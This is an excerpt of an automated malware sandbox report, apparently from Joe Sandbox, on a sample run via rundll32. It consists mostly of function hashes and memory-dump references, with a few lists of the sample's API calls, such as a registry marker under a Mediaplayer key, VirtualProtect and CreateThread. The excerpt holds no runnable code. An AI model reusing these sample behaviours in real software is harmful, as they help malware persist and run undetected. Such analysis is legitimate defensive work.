      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 3fef0f4d7e9c3a6715cc1d5a02c7c9c282143ade2b966986f2c342b23fc0118a
      • Instruction ID: 623cc21546c2950354300ad73b1ae42cc8612f062e93ad1e39b27b732f7275db
      • Opcode Fuzzy Hash: 3fef0f4d7e9c3a6715cc1d5a02c7c9c282143ade2b966986f2c342b23fc0118a
      • Instruction Fuzzy Hash: 7C827E716187928FC775CF28C884BEAB7E1BFD5310F148A2DD4999B390DB34A945CB82
      Function 065FD780 Relevance: .8, Instructions: 790COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6a2226ea47b2e38efbfc39fbaea6305956f2a56e00cf0c6b883367e156a63ffa
      • Instruction ID: c7a80fdb620d40656cb66ca9457ffabb61c86f7aeb0590fe1515ac5830559349
      • Opcode Fuzzy Hash: 6a2226ea47b2e38efbfc39fbaea6305956f2a56e00cf0c6b883367e156a63ffa
      • Instruction Fuzzy Hash: 5B72C1716183828FC769CF28C995BAAFBE9FFC4214F144A2DE199C7390E734A605CB51
      Function 06622C90 Relevance: .7, Instructions: 706COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 534250bcc6a86e9feccb8767a7f266c576d948b87e11db586026b5d8fac135a5
      • Instruction ID: ef03d9f62793d64f5d043d107b37d0dba3c63edfc17b93b29edf9148c6590fe3
      • Opcode Fuzzy Hash: 534250bcc6a86e9feccb8767a7f266c576d948b87e11db586026b5d8fac135a5
      • Instruction Fuzzy Hash: 41627A72A096918FE374CF29C580AABB7E2BFC5314F15CA5DC4895B359DB346806CF82
      Function 066112F0 Relevance: .7, Instructions: 667COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5e5cb0110573d91f551757ac4a39a9cb686a20d654197a444d03f25745ecfc31
      • Instruction ID: c67cb5723dff3af2b061c7fa89cbb6ab025fbd517e228d6a4c04d66b0ab702ef
      • Opcode Fuzzy Hash: 5e5cb0110573d91f551757ac4a39a9cb686a20d654197a444d03f25745ecfc31
      • Instruction Fuzzy Hash: 5232E576B147118FD728CF29CC8169AF7E2BBC9314F09962DE959D7794EB34E8018B80
      Function 065D2BD6 Relevance: .6, Instructions: 573COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b16f50e1b8c11047db03a2934f7c749350501b404038d97a42424d085986f04a
      • Instruction ID: 52c10211f2048690b7a70eacbf5541911d6a40b01106f23afcd122540c760326
      • Opcode Fuzzy Hash: b16f50e1b8c11047db03a2934f7c749350501b404038d97a42424d085986f04a
      • Instruction Fuzzy Hash: 0A22E87BA147158FD728CF29C4D16EAF7D3BBC8304F0A9A2DC54ADB254DE70A9058B81
      Function 065D2E4E Relevance: .6, Instructions: 564COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 338c4c549bdd0bc70bc3f3e84ec0c87d58949c544bb1c529a8c576030047117d
      • Instruction ID: 5cc879f361fecbc13bf85c4328571158687bbd4499e8ab04198594a33b7f8a0b
      • Opcode Fuzzy Hash: 338c4c549bdd0bc70bc3f3e84ec0c87d58949c544bb1c529a8c576030047117d
      • Instruction Fuzzy Hash: 1622097B6146418FD728CF29C4D17EAF7E3BBC8304F099A3EC54ADB254DE74A5098A41
      Function 065D3665 Relevance: .5, Instructions: 452COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f59203eb20bc4954b436728c06b9ece161d497211e6c80ff1e67056e96c8e059
      • Instruction ID: 3add2002266510b26a86a6e82502919fb3faaad2a578d5fb900bb5606d18c44c
      • Opcode Fuzzy Hash: f59203eb20bc4954b436728c06b9ece161d497211e6c80ff1e67056e96c8e059
      • Instruction Fuzzy Hash: CA02D37B6146428FD738CF29C4D17EAF7E3BBC8304F199A6DC54ACB254DE70A9058A41
      Function 065D1290 Relevance: .4, Instructions: 445COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 07e59f48ddca9751fdf4df3174852380d9ff739cc9f7b7970b13f4b6e76a3635
      • Instruction ID: af7a9aa641951c94937dc0984f13f361509cc384191c9d16071d2873c9fd8b5d
      • Opcode Fuzzy Hash: 07e59f48ddca9751fdf4df3174852380d9ff739cc9f7b7970b13f4b6e76a3635
      • Instruction Fuzzy Hash: 00028332A186518FD774CF29C9806DAB7E7FFC9310F15CA2DD4899B698DB30A845CB81
      Function 065D35BB Relevance: .4, Instructions: 444COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 96b57fa9cf41c63c6d7401aca092d325fbe02b873f19111216b314e5a909598b
      • Instruction ID: b78b203688bb65817bbf7fc00bf39c92e5d94cf9fc286cb299ac4269a38c0c6a
      • Opcode Fuzzy Hash: 96b57fa9cf41c63c6d7401aca092d325fbe02b873f19111216b314e5a909598b
      • Instruction Fuzzy Hash: A702C37BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D3611 Relevance: .4, Instructions: 443COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f46257b0f09fa715d94e0aa1817180d1acc4c9cce2b072bf45b5259c26615a68
      • Instruction ID: 4e12677ccc434685aeca65ffe2b3c0f9795f88fd2751fa0362f0a47244b6eb1e
      • Opcode Fuzzy Hash: f46257b0f09fa715d94e0aa1817180d1acc4c9cce2b072bf45b5259c26615a68
      • Instruction Fuzzy Hash: 9202B47BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D327A Relevance: .4, Instructions: 442COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c99d0e2a064fa127e89e9e4ce7446255bcae3bf618c673eb8cfaed2d84b998ce
      • Instruction ID: 558566df2e6366709f4d5eaf77ffbc9195ae80609223bf9012206ea0c9b02748
      • Opcode Fuzzy Hash: c99d0e2a064fa127e89e9e4ce7446255bcae3bf618c673eb8cfaed2d84b998ce
      • Instruction Fuzzy Hash: 6302B37B6146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D36DC Relevance: .4, Instructions: 442COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 714592db6153e97f473c3cb80ac5094468ddcad9364830f4e1d20fc340a8b7cf
      • Instruction ID: b4796fac19e12e28bf8da8532fdb29481cc91239f495ef71151320a390bfff15
      • Opcode Fuzzy Hash: 714592db6153e97f473c3cb80ac5094468ddcad9364830f4e1d20fc340a8b7cf
      • Instruction Fuzzy Hash: BA02B37BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D32CE Relevance: .4, Instructions: 441COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1b23e61ac2a20cbca576d9d309459ab27611ebd8df60e6660164a654939de379
      • Instruction ID: 0d2bb3f7cfad3c59f588b2c4c9a0303d03958b816c0ac407a4f2d63f84fc52ed
      • Opcode Fuzzy Hash: 1b23e61ac2a20cbca576d9d309459ab27611ebd8df60e6660164a654939de379
      • Instruction Fuzzy Hash: 0F02B37BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D338A Relevance: .4, Instructions: 440COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6ac3d62297415fa23719009523eac8bb8a27405747ff75a040e079d862c3a15d
      • Instruction ID: f38c79b426fa046eaaf200605b93c0cab418c15ef6dd30a0200f6f8543420704
      • Opcode Fuzzy Hash: 6ac3d62297415fa23719009523eac8bb8a27405747ff75a040e079d862c3a15d
      • Instruction Fuzzy Hash: 8A02B37BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D308E Relevance: .4, Instructions: 437COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 91412cf500165df721effc93ba6bce9311dc45f516244a9982829d53b1dc4779
      • Instruction ID: cfc0b60df0ffc5d2f8650e5a0eba85c0b427a0737f9b01aaae65a8bf41cdd8ba
      • Opcode Fuzzy Hash: 91412cf500165df721effc93ba6bce9311dc45f516244a9982829d53b1dc4779
      • Instruction Fuzzy Hash: 23F1B47B6186428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D3358 Relevance: .4, Instructions: 436COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9fc3480e0e2fd7e037dc4de7618611d0f10ac9c7b150fdf94cf6da3d5350e332
      • Instruction ID: 66e390b8902737e983dc0dcb609ced775fc4e1ed4aef8f0a4801b057edaa8adb
      • Opcode Fuzzy Hash: 9fc3480e0e2fd7e037dc4de7618611d0f10ac9c7b150fdf94cf6da3d5350e332
      • Instruction Fuzzy Hash: EBF1C57B6186428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D3028 Relevance: .4, Instructions: 436COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a3caa46718b86509800435922e1e8f405745e00640665f5518203732c7830dd4
      • Instruction ID: dd2fb8f1684b2c3015e2637be9ab5c834398cbf1d37452e58d1d18a0848c59d9
      • Opcode Fuzzy Hash: a3caa46718b86509800435922e1e8f405745e00640665f5518203732c7830dd4
      • Instruction Fuzzy Hash: 04F1C47B6146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ACB254DE70A9058A41
      Function 065D30CB Relevance: .4, Instructions: 436COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4544674765ad880f223d204030ce20d61ab4e6b36a3e5c145d749bac315a04a1
      • Instruction ID: 66c4348763e927ab4f37597946293282cead93a5376c0ef7137a63957d53b893
      • Opcode Fuzzy Hash: 4544674765ad880f223d204030ce20d61ab4e6b36a3e5c145d749bac315a04a1
      • Instruction Fuzzy Hash: A5F1C57B6186428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A5058A41
      Function 065D2DC0 Relevance: .4, Instructions: 436COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f11ef36a0f048027ae537dfe31a0ad46c4f2324c02f57f95f5b0aaecb230b09b
      • Instruction ID: b8cf912abda873916b35d3014a7608c0bf45faee6bad4f8f382c251d3ac6d2b9
      • Opcode Fuzzy Hash: f11ef36a0f048027ae537dfe31a0ad46c4f2324c02f57f95f5b0aaecb230b09b
      • Instruction Fuzzy Hash: 41F1C57B6186428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A5058A41
      Function 065D2DFE Relevance: .4, Instructions: 436COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 992e65863eec4a0f568e4f3470f3aad5e6af5171d0f82c9e99518f558cd3329a
      • Instruction ID: ac02fa58241e3aeb012f1307fceb4ead27a8c9ab9c5d0781b2448050b8333759
      • Opcode Fuzzy Hash: 992e65863eec4a0f568e4f3470f3aad5e6af5171d0f82c9e99518f558cd3329a
      • Instruction Fuzzy Hash: 84F1C57B6186428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A5058A41
      Function 065D3322 Relevance: .4, Instructions: 435COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1c09fabc62c18285bfd1dbda5fa3a340a9d61280e807b6bbcc3eba2d2c81729f
      • Instruction ID: 3b851a2c0930957097cf6c441cca3bb959649cbbdb53a9ff93465dc58c0352ed
      • Opcode Fuzzy Hash: 1c09fabc62c18285bfd1dbda5fa3a340a9d61280e807b6bbcc3eba2d2c81729f
      • Instruction Fuzzy Hash: D9F1B47B6146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D33D5 Relevance: .4, Instructions: 435COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f38f7ecbf4e36226535330aab4116d802a5b912e58ca2cb1104b28d39dd00d11
      • Instruction ID: 280ebcaf501e79dfc37e61b1dbae09d7ff44b18bc9a35e5d0315f59876094e4d
      • Opcode Fuzzy Hash: f38f7ecbf4e36226535330aab4116d802a5b912e58ca2cb1104b28d39dd00d11
      • Instruction Fuzzy Hash: 34F1C37BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 065D3055 Relevance: .4, Instructions: 434COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 67ec540b2c0b405d83d8f1a42bf8063d51244ef7eecaf5b4577a60f41658f4aa
      • Instruction ID: 22a9d4439db1fc5e270b336e8b467e08f42a914c8cef994a0ac8fe0fd6f7e6f1
      • Opcode Fuzzy Hash: 67ec540b2c0b405d83d8f1a42bf8063d51244ef7eecaf5b4577a60f41658f4aa
      • Instruction Fuzzy Hash: 51F1B47B6146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A5058A41
      Function 065D3106 Relevance: .4, Instructions: 433COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9ff8a932c88265b978c6d395aacd6b76a3dfd638e64b613daf005228b21b709f
      • Instruction ID: eadbbdc645cab821c4331e205e0fd662dcfe96a26d34070b32480fdf8df42d21
      • Opcode Fuzzy Hash: 9ff8a932c88265b978c6d395aacd6b76a3dfd638e64b613daf005228b21b709f
      • Instruction Fuzzy Hash: 88F1C47BA146428FD738CF29C4D17EAF7E3BBC8304F199A2DC54ADB254DE70A9058A41
      Function 0660CFC0 Relevance: .4, Instructions: 390COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b74c94e26b32340d1baf3dfbfe5a8af1eef455014658002ca474d6a175d0037f
      • Instruction ID: 0f0dba7e777c7444209124c327830f12e0e53434aa1756f0f3cf8e7e38ca885a
      • Opcode Fuzzy Hash: b74c94e26b32340d1baf3dfbfe5a8af1eef455014658002ca474d6a175d0037f
      • Instruction Fuzzy Hash: 90E1A176B046128FD718CF69C880AA6B7E2BFC8314F098A29D559D7744DB74F916CBC0
      Function 06600EE0 Relevance: .3, Instructions: 299COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 219f7bf35795fea1f0fc57a375831f0b010b9d99703148828d6fa619853f7a27
      • Instruction ID: 3bc1d0da3bc1c7a1e65033f138fe771c6602dee32199fe129dd4c2a9e38c01cf
      • Opcode Fuzzy Hash: 219f7bf35795fea1f0fc57a375831f0b010b9d99703148828d6fa619853f7a27
      • Instruction Fuzzy Hash: 47D17F716083828FD368CF54C880BABF7E2FBD6314F158969E499CB685D730E945CB92
      Function 066089F0 Relevance: .3, Instructions: 294COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8404e2468e543ad4d932b683c73065f5a08fdcf226686e48d991b1b22b3dbfd3
      • Instruction ID: e16ed2151670babcce4e6463f3c9b9b2c981c28e943b015b34e5edddcadfab6b
      • Opcode Fuzzy Hash: 8404e2468e543ad4d932b683c73065f5a08fdcf226686e48d991b1b22b3dbfd3
      • Instruction Fuzzy Hash: 2CA1687BB147104FD708CF29C8812AAF7E7ABD9310F1ED66ED485DB394DA74A8068780
      Function 066252F2 Relevance: .3, Instructions: 275COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f728a3926bdb26861f08b50aad04c158fbb2c258bdbc76d6700eaaa6b6231659
      • Instruction ID: 7961f23cab4586c06b87d2d31a85458050922ddcc77449ae14097b7ea6ab4996
      • Opcode Fuzzy Hash: f728a3926bdb26861f08b50aad04c158fbb2c258bdbc76d6700eaaa6b6231659
      • Instruction Fuzzy Hash: AF91F577B14B114FD728CF29C8811AAF7E3BBC8310F1A962ED499D7354DE74AC068A81
      Function 0660BB30 Relevance: .2, Instructions: 199COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 18da770679b8e224faaa3ee947c36fd15b5c1bff6f1b97547884bd150cfd2b55
      • Instruction ID: bbd3fe1e9b92430e2467664ef752a9bf8003e51a505942f6c654f4349efa8a7a
      • Opcode Fuzzy Hash: 18da770679b8e224faaa3ee947c36fd15b5c1bff6f1b97547884bd150cfd2b55
      • Instruction Fuzzy Hash: 43815A36608341CFD364CF28C880B9BFBE2FF99314F158969E9949B394D731A845CB92
      Function 27AC18CB Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00009088), ref: 27AC18D7
      • WaitForSingleObject.KERNEL32(00000000), ref: 27AC18DE
        • Part of subcall function 27AC1120: GetTickCount.KERNEL32 ref: 27AC116C
        • Part of subcall function 27AC1120: SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
        • Part of subcall function 27AC1120: SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
        • Part of subcall function 27AC1120: UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
        • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC122C
        • Part of subcall function 27AC1120: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
        • Part of subcall function 27AC1120: GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
        • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC128C
      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 27AC18EC
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: CreateValuesprintf$AllocComputeCountCrc32EventGlobalObjectProcessSequentialSingleTerminateTickUuidWait
      • String ID:
      • API String ID: 3103566969-0
      • Opcode ID: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
      • Instruction ID: 63fbabbbf26330366ed9b718a62b1419555281b4622388cdf8ef43b824dd0547
      • Opcode Fuzzy Hash: 8dabf4b52cb4f457aca4ebc0624c47dc4196281b91c428161e50fb08894ee4ce
      • Instruction Fuzzy Hash: FAD0C9729021307A916226628C1DCCB2E1CEF2ABB1310031BB529400D0CA2C4882C5F5
      Function 030E1EB1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 343 30e1eb1-30e1f0d VirtualProtect 344 30e2067-30e208f 343->344 345 30e1fcb-30e2034 call 30e14a3 344->345 346 30e2095 344->346 345->344
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22960009314.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_30e0000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID: X
      • API String ID: 544645111-3081909835
      • Opcode ID: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
      • Instruction ID: 03f50ab0ed465b842811ad92f4cbe926329b94b154d59a766ab61ddeebc71df8
      • Opcode Fuzzy Hash: d2a3a0994755566863b41518f0ba61358616c682e99c523238f9e6b8a90c07c6
      • Instruction Fuzzy Hash: 3431DEB5E006288FCB48CF58C880A9DFBF1FF48310F5981AAC909A7752D731A991CF90
      Function 27AC18F6 Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 442 27ac18f6-27ac1908 CreateThread
      APIs
      • CreateThread.KERNEL32(00000000,00000000,Function_000008CB,00000000,00000000,00000000), ref: 27AC1902
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
      • Instruction ID: 172ebd3abfcba25a4b18c4b3e631a9a31cace7394975a7142e15f80cdbddfbe7
      • Opcode Fuzzy Hash: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
      • Instruction Fuzzy Hash: B0B011E2B00000BEBA00CA208F28C3B23ACE320B22300082A3C00E0008C22C8C02C230
      Function 030E2222 Relevance: 1.3, APIs: 1, Instructions: 89memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.22960009314.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_30e0000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: f18fb4789033bd6a9fde9bedef3c37d3305af639d180213a74387e95bf1014db
      • Instruction ID: 28155cd055f31bd19e0baa37ddad42c24046a10a46bf19a46dbf537abee94d42
      • Opcode Fuzzy Hash: f18fb4789033bd6a9fde9bedef3c37d3305af639d180213a74387e95bf1014db
      • Instruction Fuzzy Hash: 214121B5A012068FDB08DF98C5946AEFBF0FF88304F1485AED858AB351D375A885CF91

      Non-executed Functions

      Function 065D5489 Relevance: 87.5, Strings: 54, Instructions: 20001COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
